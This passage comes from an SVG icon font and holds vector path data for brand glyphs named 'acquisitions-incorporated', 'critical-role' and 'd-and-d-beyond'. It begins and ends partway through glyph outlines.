c-71.2002 11.4004 -106.2 41 -110.4 46c3.60059 -6.2002 13.2002 -17.7998 16 -40.0996l-1.7002 -1.2002c-4.2998 15.5996 -16.3994 46.5996 -55.7998 69.5996l23.6006 -2.5c-10.5 12.6006 -36.3008 17.8008 -40.8008 16l-2.5 2.5l8.40039 8.40039l-22.2998 -5.7998
l5.39941 13.5c-8.09961 -4.40039 -4.2998 -2.40039 -17 -8.90039l-1.69922 0.5c0.599609 0.600586 0.899414 -0.700195 -3 9.2998c-0.600586 -11 -0.400391 -8.59961 -1 -11.7998c-1.60059 -0.599609 -0.800781 -0.200195 -3.7002 -1.7002
c-40 20.6006 -57.2002 11 -73 5.2002c36.7998 -6 29.2998 -4 38.3994 -9.2998c-25.7998 -12.2002 -31.8994 -12.5996 -51.3994 -70.0996l22.2998 22.2998l2.5 -16.4004c13.4004 -58 68.7002 -92.5 126.4 -83.3994l-26.1006 22.3994l44.7998 -22.3994l-1.19922 -3
c4.59961 -1.7002 9.2998 -3 13.5 -4.2002c30 -8.90039 61.1992 -11.1006 93.1992 -6.40039l-32.5 21.2002c35.8008 -7 50.7002 -31.4004 56.8008 -39.5996l-7.60059 29l1.2002 2.5l19 -27.9004l-9.2998 26.5996l21.8994 -13.5h1.2002l-3.39941 4.2002l7.09961 -4.7002
l-14.2998 16l1.2002 3l7.59961 -7.09961c4.2998 1.2002 41.4004 10.5 80.9004 40.2998c47.8994 35.4004 68.0996 73.7998 71.5996 79.7002l-3 9.2998zM472.9 260.6l-18.2002 -1.19922l14.2998 -11.8008zM218.1 253.5c2.7002 -5.09961 5.7002 -12.4004 18.4004 -18.7998
c-7.5 -10.9004 -8.2998 -10.5 -20.2002 -16c-7.59961 -7.7002 -13.5 -13.1006 -17.7002 -14.7998l7.10059 13c-8.2998 -3 -16.4004 -3.7002 -24.7998 -2.5l-0.5 1.19922c19 2.10059 37.1992 9.40039 46.5 16c-4.10059 4.2002 -7.10059 11.3008 -8.80078 21.9004z
M221.8 355.8c6.40039 -3.7002 11 -8.39941 14.2998 -13.7998c14.7002 -24.0996 19.2002 -40.0996 11.3008 -47.7002c-7.90039 -7.59961 -16.8008 -7.09961 -26.1006 3c-9.2998 10.1006 -13.5 23.6006 -11.7998 39.6006c1.7002 15.8994 5.90039 22.2998 12.2998 18.8994z
M217.1 309.5c7.10059 -21.2998 33.4004 -23.0996 26.9004 4.90039c-3.90039 16.5 -8.7998 27.0996 -15.2002 32.5c-6.59961 5.39941 -10.0996 6.69922 -11.2998 4.19922c-2.5 -2.89941 -3.5 -11.2998 -3 -24.7998c7.5 12.7998 11.5996 5.90039 12.5 4.7002l-0.5 -0.5
c-0.799805 -1.7002 -2.59961 -3.09961 1.7002 -6.2002l1.2002 0.5v-4.7002c-1.80078 -12.5 -6.90039 -12.7998 -12.3008 -10.5996zM172.1 315c-2.19922 0.5 -4.19922 1.7002 -5.39941 4.2002c-3.5 8.5 0 21.2002 8.09961 21.2002c2 -0.5 3.7002 -1.7002 5.40039 -4.7002
c-1.5 -0.400391 -4.7002 -4.7998 0.700195 -5.90039h0.5c0 -13.7002 -7.7002 -15.0996 -9.30078 -14.7998zM212.2 365.1l-3.7002 2.40039l-0.5 2.5c18.2998 0 25.7998 -8.7998 28.2998 -14.2998c-8.89941 4.7002 -17.7002 6.39941 -26.0996 5.89941l-0.5 3zM140.4 315.7
c1.59961 -1.60059 0.599609 -0.299805 4.89941 -6.60059c-25.3994 -4.69922 -23.2002 -12.2998 -30 -12.2998c0.299805 0.600586 7.10059 16 23.6006 16l-7.10059 7.60059c9.40039 0.5 15.2002 2.09961 19.9004 -5.90039c0 8.7998 1.2002 16.5 2.89941 23.5996
c2 7.60059 3.7002 11.8008 5.40039 13.5c1 1.5 16.2998 15.7002 29 22.4004c4.2002 2.90039 8.7998 3.40039 13.5 1.7002c0.5 -0.5 0.5 -1.2002 0.5 -1.7002l-13 -7.59961c7.59961 -11.8008 10.5 -25.3008 8.7998 -41.3008c-1.2998 -11.0996 -6 -20.6992 -14.7998 -28.2998
l2.90039 -4.7002c-30 2.2002 -24.8008 6.80078 -46.5 23.6006zM159.1 334.4c-1.7998 -7.2002 -2.2998 -16 -3.09961 -26l5.40039 -6.40039l7.09961 -3.40039c2.90039 -0.5 6.59961 -1 11.2998 -0.5c1 1.7002 3.5 4.2002 6.40039 7.60059
c5 5.89941 7.89941 13.7998 8.39941 23.0996c0.400391 8.7998 -0.5 17.7002 -3 25.2998c-3 8.10059 -5.89941 11 -10.0996 9.30078c-5.40039 -1.7002 -10.5996 -5.40039 -16 -11.8008c-3 -4.19922 -5.2002 -9.59961 -6.40039 -17.1992zM201.1 278.3l-3.09961 -6.5
c7.09961 4.2002 13.5 7.2002 19.4004 8.40039l7.09961 0.5l11.7998 -7.60059h-2.5c-8.7998 3.7002 -19.3994 1.2002 -30.7002 -7.59961c-0.5 -4.7002 1.7002 -14.7002 5.90039 -29.5l9.2002 0.5c-21.9004 -6.59961 -37.6006 -8.40039 -48.9004 -5.40039
c-24.8994 6.7002 -27.3994 23.6006 -27.5 24.1006c-2.89941 11.2998 -3.39941 22.3994 -1.7002 33.7002c-6.39941 -0.5 -11 -4.2002 -15.1992 -10.6006c-2.90039 5.90039 -5.40039 8.7998 -5.90039 9.2998c1.5 0.700195 12.2998 7.5 32.5 4.90039l0.5 -2.5l-5.90039 -1.2002
c-0.0996094 -0.399414 -1.89941 -29.5 18.9004 -24.7998c1.40039 0.299805 1.2998 -0.0996094 36.0996 14.2998z" />
    <glyph glyph-name="acquisitions-incorporated" unicode="&#xf6af;" horiz-adv-x="345" 
d="M338.5 -20.2002c2.2002 -14.2998 4.09961 -28.7002 6.59961 -43.7002h-337.1c-4 0 -6.09961 0.700195 -5.2998 5.7002c2.09961 12.9004 3.5 25.9004 5 38.7998c0.5 4.80078 2.2998 6.80078 7.59961 6.80078c118.101 -1 114.9 -0.300781 121.4 2.39941
c9.39941 4 14.8994 12.9004 14.8994 23.1006c-0.0996094 42.8994 -0.299805 85.8994 -0.199219 128.8c0 3.7998 -1.2002 5.89941 -4.60059 6.7998c-15.7002 3.90039 -31.2998 7.7002 -47.5996 11.7002c-5.2998 -12.2998 -10.4004 -24.4004 -15.7002 -36.7002
c1.7998 -3.2998 28.4004 -2.90039 35.2998 -2.90039v-27.5996h-114.3c1 8.59961 1.7002 16.7998 3.2002 24.9004c0.299805 1.39941 3.59961 3.09961 5.5 3.19922c8.39941 0.400391 16.8994 0.300781 25.3994 0.100586c4 0 5.90039 1.09961 7.60059 5.2002
c16.5996 40.6992 13.5 31.1992 67.2998 161c31.5 76.0996 33 76 32.5996 87.3994c-0.699219 18.6006 -25.3994 22.2998 -37.6992 22.1006c-30 -0.400391 -38.4004 0.5 -101.801 0.5c-7.19922 44.5 -4.19922 32.0996 -6.39941 45.2998
c-0.700195 4.2002 1 5.2998 4.59961 5.2998l339.101 -0.200195c-0.800781 -5.39941 -1.60059 -10.7998 -2.40039 -16.0996c-1.2998 -9.7002 -2.7998 -19.4004 -4 -29.2002c-0.299805 -2.90039 -1.2002 -4.2998 -4.2998 -4.2998
c-20.6006 -0.100586 -41.2002 -0.100586 -61.7998 -0.5c-18.7002 -0.400391 -37.6006 -0.299805 -56.2002 -2c-13.4004 -1.2002 -23.2998 -12.6006 -18.9004 -26.6006c8.60059 -27.0996 27.7002 -69.0996 36.5 -89.1992c65.7002 -154.2 61.4004 -157 84 -158.601
c6.60059 -0.5 13.4004 -0.0996094 20.4004 -0.0996094c1.2998 -9.40039 2.59961 -18 4 -27.5h-116v27c10.3994 0 20.3994 0.0996094 30.3994 -0.100586c3.5 0 5 0.700195 3.40039 4.40039c-4.40039 10.2998 -8.7002 20.5996 -13.2002 30.9004
c-1.59961 3.69922 -4.09961 4.7998 -8.39941 3.5c-12.4004 -3.60059 -24.8008 -6.7002 -37.3008 -9.7002c-4.2998 -1.10059 -6 -2.7998 -5.89941 -7.5c0.799805 -57.5 0.899414 -127.5 1 -129.101c0.399414 -12.5996 8.7002 -21.3994 21 -23.0996
c0.899414 -0.200195 12.8994 -2.7998 112.7 -2.59961c8.2998 0 8.39941 0.0996094 9.59961 -7.60059zM163.6 185.5c6.2002 -2 12 -2.2002 18.4004 0c13 4.2002 26.2998 7.7998 39.4004 11.7002c1.39941 0.5 2.69922 1.5 3.89941 2.09961
c-6.7002 17.4004 -13.0996 34.2002 -19.7002 50.9004c-8.89941 22.7002 -17.6992 60.2998 -27 82.7998c-1.5 0.799805 -1.89941 -2.40039 -9.39941 0c-17.1006 -44 -34.1006 -87.7998 -51.2998 -132.1c2.2998 -1.2002 4 -2.30078 5.7998 -2.90039
c13.2998 -4.2998 26.5996 -8.2998 39.8994 -12.5z" />
    <glyph glyph-name="critical-role" unicode="&#xf6c9;" horiz-adv-x="445" 
d="M224.82 448c0.259766 -0.150391 216.569 -124.51 217.12 -124.72c3.04004 -1.18066 3.69922 -3.45996 3.69922 -6.56055c-0.0693359 -83.4502 -0.0595703 -166.899 -0.00976562 -250.359c0 -2.77051 -0.979492 -4.43066 -3.37988 -5.78027
c-21.3701 -11.9902 -207.86 -118.29 -218.93 -124.58h-3c-79.3203 45.6602 -218.24 125.44 -218.391 125.52c-1.29004 0.740234 -1.95996 1.75 -1.87988 3.24023c0.0400391 0.870117 -0.0302734 225.94 -0.0498047 253.101c0 2.43945 0.889648 3.79004 2.92969 4.92969
c23.2607 13.0996 209.271 119.229 220.141 125.21h1.75zM214.4 427.58l-0.220703 0.160156c-64.75 -36.8604 -129.489 -73.7402 -194.229 -110.61c0.0400391 -0.120117 0.0800781 -0.229492 0.129883 -0.349609c10.1895 -3.83984 20.3896 -7.69043 30.8604 -11.6406
c-7.70996 -5.98926 -8.32031 -6.0293 -10.6504 -5.12988c-0.0996094 0.0400391 -24.1699 9.28027 -26.7998 9.99023v-230.42c0.879883 1.41016 64.0693 110.91 64.1299 111.01c1.62012 2.82031 3.03027 1.91992 9.12012 1.52051
c1.39941 -0.0908203 1.47949 -0.220703 0.779297 -1.41992c-41.1895 -71.3301 -36.3994 -62.9902 -67.4795 -116.94c-0.80957 -1.40039 -0.610352 -1.12988 1.25 -1.12988c227.729 0 176.4 0 186.5 -0.0302734c1.44043 0 1.69043 0.230469 1.7002 1.64062
c0.00976562 2.95996 0.00976562 5.91992 0 8.87988c0 1.33984 2.35938 0.80957 -18.3701 1.00977c-7.45996 0.0703125 -14.1396 3.21973 -21.3799 12.7002c-7.37988 9.66016 -14.6201 19.4297 -21.8506 29.21c-2.2793 3.08008 -3.44922 2.37988 -16.7598 2.37988
c-1.75 0 -1.78027 0 -1.75977 -1.82031c0.290039 -26.21 0.149414 -25.2695 1.04004 -32.6602c0.519531 -4.37012 2.16016 -4.19922 9.68945 -4.80957c3.14062 -0.259766 3.88086 -4.08008 0.520508 -4.91992c-1.57031 -0.390625 -31.6006 -0.509766 -33.6699 0.0996094
c-2.27051 0.660156 -2.5498 4.08008 0.299805 4.73047c3.29004 0.759766 6.16016 -0.810547 6.66016 4.43945c1.2998 13.6602 1.16992 9.04004 1.09961 79.4199c-0.00976562 10.8203 -0.349609 12.5801 -5.35938 13.5508
c-1.2207 0.239258 -3.54004 0.15918 -4.69043 0.549805c-2.87988 0.969727 -2 4.83984 1.77051 4.84961c33.6699 0.0302734 46.0791 1.07031 56.0596 -4.85938c7.74023 -4.61035 11.9795 -11.4805 12.5098 -20.4004c0.879883 -14.5898 -6.50977 -22.3496 -14.9902 -32.5898
c-0.679688 -0.820312 -0.719727 -1.37988 -0.0400391 -2.2207c2.60059 -3.25 5.05078 -6.62988 7.71094 -9.8291c27.5596 -33.2305 24.1094 -30.54 41.2793 -33.0605c0.890625 -0.129883 1.02051 0.419922 1.00977 1.15039
c-0.0195312 3.66992 0.0107422 7.33008 -0.0195312 11c-0.00976562 1.01953 0.320312 1.42969 1.41016 1.25977c12.54 -1.91016 21.8496 0.0703125 23.5801 0.299805c1.08008 0.150391 1.5 -0.200195 1.47949 -1.33008c0 -0.109375 0.879883 -26.6895 0.870117 -26.7998
c-0.0498047 -1.51953 0.669922 -1.62012 1.89062 -1.62012c62.3799 0.0205078 125.149 0.0205078 186.71 0.0205078c-27.1201 47.0293 -54.1104 93.8496 -81.1807 140.81c2.25977 0.660156 -0.399414 0.0302734 6.69043 1.38965
c2.03027 0.390625 2.0498 0.410156 3.10938 -1.43945c7.31055 -12.6396 77.3105 -133.96 77.3701 -134.061v230.46c-1.71973 -0.5 -103.3 -38.7197 -105.76 -39.6797c-1.08008 -0.419922 -1.5498 -0.200195 -1.91016 0.879883
c-0.629883 1.90039 -1.33984 3.76074 -2.08984 5.62012c-0.320312 0.790039 -0.0898438 1.12988 0.650391 1.39062c0.0996094 0.0390625 95.5293 35.8496 103.04 38.7695c-65.4199 37.5703 -130.561 75 -196.011 112.6c29.0703 -50.3594 57.9502 -100.369 86.8203 -150.39
c-0.0898438 -0.110352 -0.179688 -0.219727 -0.280273 -0.330078c-9.56934 0.900391 -10.46 1.60059 -11.7998 3.94043c-0.959961 1.68945 -73.5 127.71 -82 142.16c-9.09961 -14.6709 -83.5596 -146.211 -85.3701 -146.32
c-2.92969 -0.169922 -5.87988 -0.0800781 -9.25 -0.0800781c28.8301 49.8301 57.5 99.4199 86.1807 149zM266.33 297.66c1.84961 0.0498047 3.7002 0.519531 5.54004 0.849609c1.68945 0.299805 2.53027 -0.200195 2.59961 -1.91992
c0 -0.109375 0.0703125 -19.0596 -0.859375 -20.4502c-0.870117 -1.2998 -1.87988 -1.21973 -2.60059 0.19043c-4.95996 9.68945 6.2207 9.66016 -39.1201 12.0498c-0.699219 0.0400391 -1 -0.229492 -0.969727 -0.929688c0 -0.129883 3.71973 -121.98 3.73047 -122.11
c0.0195312 -0.889648 0.519531 -1.2002 1.20996 -1.50977c2.91992 -1.31055 5.95996 -2.41992 8.69922 -4.0498c7.31055 -4.33008 11.3809 -10.8398 12.4102 -19.3105c1.44043 -11.7998 -2.76953 -35.7695 -32.21 -37.1396
c-2.75 -0.129883 -28.2598 -1.08008 -34.1396 23.25c-4.66016 19.2598 8.25977 32.7002 19.8896 36.4004c1.49023 0.469727 1.9502 1.25977 1.98047 2.65918c0.0996094 5.62988 3 107.101 3.70996 121.351c0.0498047 1.08008 -0.620117 1.16016 -1.35059 1.14941
c-32.3496 -0.519531 -36.75 0.34082 -40.2197 -8.51953c-2.41992 -6.17969 -4.13965 -1.32031 -3.9502 -0.230469c0.879883 4.98242 2.36328 13.0605 3.31055 18.0303c0.399414 2.11035 1.42969 2.61035 3.42969 1.86035c5.58984 -2.11035 6.71973 -1.7002 37.25 -1.91992
c1.73047 -0.0107422 1.78027 0.0800781 1.82031 1.84961c0.679688 27.4902 0.580078 22.5898 0.969727 29.5498c0.0703125 1.29004 -0.410156 2.16992 -1.62988 2.7998c-5.59961 2.91016 -8.75 7.55078 -8.90039 13.8701c-0.349609 14.8105 17.7207 21.6699 27.3799 11.5107
c6.84082 -7.19043 5.80078 -18.9102 -2.44922 -24.1504c-1.66016 -1.05957 -2.31055 -2.33008 -2.2207 -4.33984c0.0302734 -0.589844 -0.109375 4.30957 0.980469 -30.0498c0.0302734 -0.900391 0.429688 -1.12012 1.24023 -1.11035
c0.0996094 0 23.0098 0.0898438 34.4697 0.370117zM67.2695 306.3c19.8408 4.50977 32.6807 0.560547 52.4902 -1.68945c2.75977 -0.310547 3.74023 -1.2207 3.62012 -3.99023c-0.209961 -4.99023 -1.16016 -22.3301 -1.24023 -23.1504
c-0.0996094 -1.04004 -0.599609 -1.91016 -1.62988 -2.33984c-4.05957 -1.7002 -3.60938 4.4502 -4.00977 7.29004c-3.12988 22.4297 -73.8701 32.7002 -74.6299 -25.4004c-0.310547 -23.9199 17.0098 -53.6299 54.0801 -50.8799
c27.2402 2.01074 19.0498 20.1904 24.8398 20.4707c1.97949 0.0996094 3.33008 -1.33008 2.97949 -3.36035c-1.8291 -10.8496 -3.41992 -18.9502 -3.44922 -19.1504c-1.51074 -9.17969 -86.6699 -22.0801 -93.3506 42.0508
c-2.67969 25.8691 10.4707 53.3691 40.2998 60.1494zM147.26 218.63c-6.5 0.0302734 -12.9902 0 -19.4902 0.0400391c-1.95996 0.00976562 -2.7793 1.61035 -2.65918 1.79004c2.37988 3.75 5.88965 -0.919922 5.85938 6.13965
c-0.0800781 25.75 0.209961 37.9902 0.230469 40.1006c0.0302734 3.41992 -0.530273 4.64941 -3.32031 4.93945c-7 0.720703 -3.11035 3.37012 -1.11035 3.37988c11.8408 0.100586 22.6201 0.180664 30.0508 -0.719727c8.76953 -1.06934 16.71 -12.6299 7.92969 -22.6201
c-1.98047 -2.25 -4.03027 -4.41992 -6.13965 -6.72949c0.949219 -1.15039 6.89941 -8.82031 17.2793 -19.6807c2.66016 -2.7793 6.15039 -3.50977 9.87988 -3.12988c1.2207 0.120117 2.11035 0.75 2.23047 2.12012c0.299805 3.41992 0.259766 -4.72949 0.450195 40.5801
c0.0195312 5.65039 -0.339844 6.58008 -3.23047 6.83008c-3.9502 0.349609 -4.0293 2.25977 -0.689453 3.37012c0.120117 0.0400391 18.9795 0.0898438 19.0898 0.0898438c0.320312 0 4.49023 -0.530273 1.0498 -3.37988
c-0.0498047 -0.0498047 -0.160156 -0.0302734 -0.240234 -0.0400391c-3.60938 -0.259766 -3.93945 -0.979492 -3.95996 -4.62012c-0.269531 -43.9297 0.0703125 -40.2295 0.410156 -42.8203c0.110352 -0.839844 0.270508 -2.22949 5.10059 -2.13965
c2.48926 0.0400391 3.85938 -3.37012 -0.0205078 -3.39941c-10.3701 -0.0800781 -20.7402 -0.0302734 -31.1104 -0.0703125c-10.6699 -0.0400391 -13.4697 6.2002 -24.21 20.8203c-1.59961 2.17969 -8.30957 2.35938 -8.19922 0.369141
c0.879883 -16.4697 0 -17.7793 3.98926 -17.6699c4.75 0.100586 4.73047 -3.56934 0.830078 -3.5498zM422.23 228.78c-1.21094 -7.12988 0.169922 -10.3799 -5.30078 -10.3398c-61.5498 0.419922 -47.8193 0.219727 -50.7197 0.30957
c-1.21973 0.0400391 -2.42969 0.44043 -3.62988 0.730469c-2.53027 0.599609 1.47949 1.22949 -0.379883 5.59961c-1.43066 3.37012 -2.78027 6.78027 -4.11035 10.1895c-0.379883 0.980469 -0.939453 1.44043 -2.04004 1.44043
c-3.12012 0 -7.26953 0.44043 -14.5801 -0.0703125c-0.580078 -0.0400391 -1.39941 -0.549805 -1.62012 -1.05957c-1.58008 -3.62012 -3.06934 -7.29004 -4.50977 -10.96c-1.26953 -3.23047 7.86035 -1.32031 12.1904 -2.16016
c2.96973 -0.570312 4.5293 -3.71973 0.660156 -3.72949c-8.79004 -0.0302734 -17.5801 -0.0605469 -26.3701 -0.0507812c-2.91992 0 -3.08984 3.15039 -0.740234 3.20996c2.66992 0.0703125 4.74023 1.12988 5.91992 3.4707c1.5 2.96973 2.7998 6.04004 4.11035 9.08984
c18.1797 42.1396 17.0596 40.1699 18.4199 41.6094c1 1.06055 2.06934 1.05078 3.0293 -0.0400391c2.93066 -3.33984 18.4004 -44.71 23.6201 -51.9199c1.95996 -2.69922 5.74023 -1.97949 6.36035 -2.00977c3.61035 -0.129883 3.96973 1.11035 4.12988 4.29004
c0.0898438 1.87012 0.0800781 -1.16992 0.0703125 41.2402c0 4.45996 -2.36035 3.74023 -5.5498 4.26953c-0.260742 0.0400391 -2.56055 0.629883 -0.0800781 3.06055c0.209961 0.200195 -0.890625 0.240234 21.6992 0.149414
c2.32031 -0.00976562 5.32031 -2.75 -1.20996 -3.44922c-1.80957 -0.19043 -2.58008 -1 -2.65918 -2.83008c-0.0703125 -1.62988 -0.19043 -38.8906 0.290039 -41.21c0.349609 -1.73047 1.72949 -2.37988 3.22949 -2.43066c13.25 -0.429688 14.9199 -0.439453 16.04 3.41016
c1.66992 5.78027 4.12988 2.52051 3.73047 0.19043zM317.55 164.41c-4.24023 0 -4.41992 3.38965 -0.609375 3.41016c35.9092 0.160156 28.1094 -0.379883 37.1895 0.649414c1.67969 0.19043 2.37988 -0.239258 2.25 -1.88965
c-0.259766 -3.38965 -0.639648 -6.78027 -1.03027 -10.1602c-0.25 -2.16016 -3.19922 -2.61035 -3.39941 0.150391c-0.379883 5.30957 -2.15039 4.44922 -15.6299 5.08008c-1.58008 0.0693359 -1.64062 0.0195312 -1.64062 -1.52051v-16.1201
c0 -1.64941 0 -1.59961 1.62012 -1.46973c3.12012 0.25 10.3105 -0.339844 15.6904 1.51953c0.469727 0.160156 3.2998 1.79004 3.06934 -1.75977c-0.00976562 -0.209961 -0.759766 -10.3496 -1.17969 -11.3896c-0.530273 -1.29004 -1.87988 -1.50977 -2.58008 -0.320312
c-1.16992 1.9502 0 5.08008 -3.70996 5.2998c-15.4199 0.900391 -12.9102 2.55078 -12.9102 -5.98926c0 -12.25 -0.759766 -16.1104 3.89062 -16.2402c16.6396 -0.480469 14.3994 0 16.4297 5.70996c0.839844 2.37012 3.5 1.76953 3.17969 -0.580078
c-0.439453 -3.20996 -0.849609 -6.42969 -1.22949 -9.63965c-0.0400391 -0.360352 -0.160156 -2.40039 -4.66016 -2.39062c-37.1602 0.0800781 -34.54 0.19043 -35.21 0.310547c-2.71973 0.509766 -2.2002 3.04004 0.219727 3.44922
c1.10059 0.19043 4.03027 -0.539062 4.16016 2.56055c2.44043 56.2197 -0.0703125 51.3398 -3.91016 51.3301zM317.14 273.93c2.45996 -0.609375 3.12988 -1.75977 2.9502 -4.64941c-0.330078 -5.2998 -0.339844 -8.98047 -0.549805 -9.69043
c-0.660156 -2.22949 -3.15039 -2.12012 -3.33984 0.270508c-0.379883 4.80957 -3.0498 7.81934 -7.57031 9.14941c-26.2803 7.73047 -32.8096 -15.46 -27.1699 -30.2197c5.87988 -15.4102 21.9902 -15.9199 28.8604 -13.7803c5.91992 1.85059 5.87988 6.5 6.91016 7.58008
c1.22949 1.2998 2.25 1.83984 3.11914 -1.09961c0.0302734 -0.100586 0.570312 -11.8906 -5.96973 -12.75c-1.59961 -0.209961 -19.3799 -3.69043 -32.6797 3.38965c-21.0098 11.1904 -16.7402 35.4697 -6.87988 45.3301c14.0293 14.0596 39.9102 7.05957 42.3193 6.46973z
M288.8 167.86c3.28027 0 3.66016 -3 0.160156 -3.43066c-2.61035 -0.319336 -4.96973 0.419922 -5 -5.45996c-0.00976562 -1.97949 -0.19043 -29.0498 0.400391 -41.4502c0.109375 -2.28906 1.14941 -3.51953 3.43945 -3.64941
c22.0303 -1.20996 14.9502 1.64941 18.79 6.33984c1.83008 2.24023 2.75977 -0.839844 2.75977 -1.08008c0.350586 -13.6201 -3.95996 -12.3896 -5.18945 -12.3994c-0.100586 0 -38.0801 0.179688 -38.1797 0.189453c-1.93066 0.230469 -2.06055 2.99023 -0.420898 3.37988
c1.99023 0.480469 4.94043 -0.399414 5.13086 2.7998c0.959961 15.8701 0.569336 44.6504 0.339844 47.8105c-0.270508 3.76953 -2.7998 3.26953 -5.68066 3.70996c-2.46973 0.379883 -1.98926 3.21973 0.34082 3.21973
c1.46973 0.0205078 17.9893 0.0302734 23.1094 0.0205078zM257.17 225.65c0.0703125 -4.08008 2.86035 -3.45996 6.00977 -3.58008c2.61035 -0.100586 2.53027 -3.41016 -0.0693359 -3.43066c-6.48047 -0.0400391 -13.7002 0.0205078 -21.6104 0.0605469
c-3.83984 0.0195312 -3.37988 3.34961 0.0400391 3.37012c4.49023 0.0292969 3.24023 -1.61035 3.41016 45.54c0.0195312 5.08008 -3.27051 3.54004 -4.71973 4.22949c-2.58008 1.23047 -1.36035 3.08984 0.40918 3.15039
c1.29004 0.0498047 20.1904 0.410156 21.1699 -0.209961c1.13086 -0.720703 1.87012 -1.65039 -0.419922 -2.86035c-0.989258 -0.519531 -3.85938 0.280273 -4.14941 -2.46973c-0.0205078 -0.209961 -0.820312 -1.62988 -0.0703125 -43.7998zM220.26 -48.6201
c1.14062 -0.660156 2.12012 -0.660156 3.25977 0c16.9902 9.79004 181.971 103.57 197.421 112.51c-0.140625 0.430664 11.2598 0.180664 -181.521 0.270508c-1.21973 0 -1.57031 -0.370117 -1.53027 -1.56055c0 -0.0996094 1.25 -44.5098 1.2207 -50.3799
c-0.0205078 -2.58008 -0.620117 -5.21973 -1.36035 -7.70996c-0.549805 -1.83008 0.379883 0.5 -13.5 -32.2295c-0.730469 -1.7207 -1.04004 -2.20996 -1.96973 0.0800781c-4.19043 10.3398 -8.28027 20.7197 -12.5703 31.0098c-1.45996 3.5 -2.24023 7 -2 10.79
c0.160156 2.45996 0.799805 16.1201 1.50977 48.0195c0.0400391 1.9502 0.0107422 1.95996 -1.95996 1.95996h-183c2.58008 -1.62988 178.32 -102.569 196 -112.76zM129.36 140.13c0 -2.39941 0.359375 -2.79004 2.75977 -3.03027
c11.54 -1.16992 21.04 -3.73926 25.6396 7.32031c6.00977 14.46 2.66016 34.4102 -12.4795 38.8398c-2.01074 0.589844 -15.96 2.75977 -15.9404 -1.50977c0.0498047 -8.00977 0.00976562 -11.5801 0.0205078 -41.6201zM235.11 155.18
c0 -2.12988 1.06934 -38.6797 1.08984 -39.1299c0.339844 -9.93945 -25.5801 -5.76953 -25.2305 2.58984c0.0800781 2.02051 1.37012 37.4199 1.10059 39.4307c-14.1006 -7.44043 -14.4199 -40.21 6.43945 -48.8008c8.43066 -3.46973 17.54 -0.599609 22.3906 7.07031
c4.90918 7.75977 6.83984 29.4697 -5.43066 38.96c-0.120117 -0.0498047 -0.239258 -0.0898438 -0.359375 -0.120117zM222.83 353.22c-9.83008 0.0302734 -9.73047 -14.75 -0.0703125 -14.8701c9.58984 -0.109375 10.1006 14.8408 0.0703125 14.8701zM142.68 249.35
c0.0205078 -1.7998 0.410156 -2.39941 2.16992 -2.58008c13.6201 -1.38965 12.5107 10.9902 12.1602 13.3604c-1.68945 11.2197 -14.3799 10.2002 -14.3496 7.81055c0.0498047 -4.5 -0.0302734 -13.6807 0.0195312 -18.5908zM354.99 242.95
c-2.03027 5.28027 -4 10.3896 -6.10059 15.8398c-2.15918 -5.48047 -4.15918 -10.5703 -6.22949 -15.8398h12.3301z" />
    <glyph glyph-name="d-and-d-beyond" unicode="&#xf6ca;" horiz-adv-x="640" 
d="M313.8 206.5c-9.89941 0 -16 7 -15.7002 7.09961c-4.2998 5.7002 -3 -0.299805 -2.39941 -1.89941c-10.9004 10.2998 -5.2998 25.3994 -5.10059 26c0.700195 1.89941 0 2.2002 -0.599609 1.89941c-1 -0.299805 -2.09961 -1.89941 -2.09961 -1.89941
c0.799805 9.09961 9.2998 14.7002 9.2998 14.7002l0.200195 -0.200195c1 -1.5 -0.400391 -3.2002 -0.600586 -9c1.60059 2.2998 7.90039 6.59961 11.4004 7.89941c-1.10059 -1.5 -2.10059 -3.59961 -2.10059 -6.59961c3.7002 4.2002 7.5 2.59961 8 2.40039
c-12.1992 -11.9004 -7 -26.6006 3.2002 -26.6006c5.7002 0 11.5 6.40039 13.9004 10.7002c2.39941 -2.40039 6.39941 -5.5 7.39941 -6.59961c-3.7998 -7.80078 -11 -17.9004 -24.7998 -17.9004zM366.2 227.6c0 -2.89941 -2.90039 -4.09961 -5.40039 -4.5
c0.700195 1.5 1.7998 5.10059 -0.200195 9c0.700195 -0.0996094 5.60059 -0.5 5.60059 -4.5zM376.5 222.4c-0.400391 -6.5 -6.90039 -11.6006 -14.5996 -10.6006c2 -1.7002 6.59961 -3 9 -1.89941c-3.90039 -6.90039 -23.1006 -7.5 -23.1006 6.39941
c-2.89941 -2.89941 -2.09961 -7.39941 0 -9.2998c-2.2002 0.700195 -5.7998 3.09961 -6.39941 7.40039c-1.30078 10.0996 4.39941 6.5 -10.4004 18.0996c-4.7998 3.7002 -3 6.59961 -4 8.5c-1.09961 2.2002 -7 4.09961 -4.5 8.5
c-0.0996094 -1.59961 1 -2.90039 2.59961 -3.5c1.80078 -0.700195 3.2002 -0.200195 4.80078 -1c1.69922 -1.2002 0.899414 -3.90039 2.19922 -5c1.10059 -0.799805 4.2002 0.299805 6.60059 -1.7998c2.59961 -2 8.2002 -6.7002 10.5996 -8.60059
c4.40039 -3.59961 8.7998 0.400391 7.40039 4.60059c4.5 -2.60059 5 -9.90039 1.2998 -12.5c10.5996 -2.40039 13 10.0996 5 11.3994c7.2998 0.700195 13.5 -4.2998 13.5 -10.6992zM337.1 240.8c4.30078 6.10059 13.3008 15.2998 23.8008 15.7998
c-5.90039 0.800781 -15.1006 -3.19922 -19.7002 -9c0.899414 3.90039 5.09961 10.1006 10.2002 13c0 0 -2.5 -3.19922 -1.40039 -3.69922c1.59961 -0.800781 5.7998 5.69922 11.2002 5.89941c0 0 -4 -2 -3.2002 -3.39941c0.599609 -0.900391 3.2998 1.2998 8 1.2998
c5.7998 0 10.9004 -3.5 13.2998 -6.2002c-4 1.09961 -11.5996 -0.799805 -13.7998 -2.7002c-0.299805 0.200195 -11.7998 9 -22 -15.5c-4.7998 3.7998 -4.40039 3.7002 -6.40039 4.5zM579.6 188.9c37.2002 0 60.4004 -19.6006 60.4004 -48.9004
c0 -28.2002 -17 -48.9004 -59.0996 -48.9004c-20.7002 0 -41.2002 1.30078 -51.6006 2.10059l7.40039 8.2002v77.1992l-7.40039 8.2002c10.2998 0.799805 29.6006 2.10059 50.2998 2.10059zM564.5 113.3c25.4004 -3.2002 46.7998 1.40039 46.7998 27
c0 22.5 -16.7002 29.6006 -46.7998 26.2998v-53.2998zM301.6 267c0.100586 -0.299805 -2.7998 2.2998 -3.2998 7.5c-0.200195 2.2998 0 19.7998 20 18.9004c11.2002 -0.600586 16.7002 -8.30078 16.7002 -16.5c0 -4.30078 -2.2998 -10.1006 -5.5 -13.8008
